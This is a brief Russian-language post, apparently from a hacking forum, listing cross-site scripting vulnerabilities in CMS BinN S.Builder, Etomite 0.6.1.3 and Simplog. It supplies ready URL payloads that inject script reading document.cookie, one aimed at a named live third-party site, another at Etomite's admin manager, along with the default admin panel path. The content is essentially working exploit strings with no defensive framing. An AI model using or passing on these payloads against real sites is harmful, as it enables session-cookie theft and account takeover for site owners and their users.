CMS BinN S.Builder - уязвимо поле "поиск" пример: Code: http://cmsobzor.ru/searth.php?search_words=%27%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&x=0&y=0 etomite0613 уязвимость в параметре a. Для удачного проведения атаки пользователь должен быть залогинен под админом Code: http://localhost/etomite0613/etomite0613/manager/index.php?a=17'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Code: http://localhost/etomite0613/etomite0613/manager/ - дефолтовая админка http://www.simplog.org - уязвимость в поиске